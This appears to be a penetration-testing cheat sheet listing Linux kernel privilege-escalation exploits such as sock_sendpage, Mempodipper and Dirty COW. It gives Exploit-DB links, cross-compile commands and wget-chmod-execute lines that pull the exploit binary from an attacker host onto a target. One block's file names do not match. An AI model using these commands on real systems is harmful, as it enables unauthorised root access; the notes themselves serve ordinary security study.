search

Kernel Exploits

Common kernel exploits usage.

hashtag
**Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) - **

https://www.exploit-db.com/exploits/9542arrow-up-right

If target machine has 32-bit architecture, we compile it with cross compiling at our machine.

$ gcc -m32 -Wl,--hash-style=both -o 9542 9542.c

$ wget http://192.168.1.1/9545 && chmod +x 9542 && ./9542

hashtag
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation

https://www.exploit-db.com/exploits/9545arrow-up-right

If this doesn't work, we should change the module. - https://bugzilla.redhat.com/show_bug.cgi?id=516949#c24- List of Modules - 24

Line 349 - if ((out_fd = socket({MODULENAME}, SOCK_DGRAM, 0)) == -1)

gcc -m32 -Wl,--hash-style=both 9545.c -o 9545

wget http://192.168.1.1/9545 && chmod +x 9545 && ./9545
linux-sendpage.c (same 9545)
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c

hashtag
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)

exploits/linux/local/35161.c

https://www.exploit-db.com/raw/35161arrow-up-right

hashtag
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

https://www.exploit-db.com/exploits/44298arrow-up-right

hashtag
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation

https://www.exploit-db.com/exploits/45010arrow-up-right

hashtag
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

https://www.exploit-db.com/exploits/40839arrow-up-right

https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.carrow-up-right

PreviousRelated LinksNextMYSQL

Last updated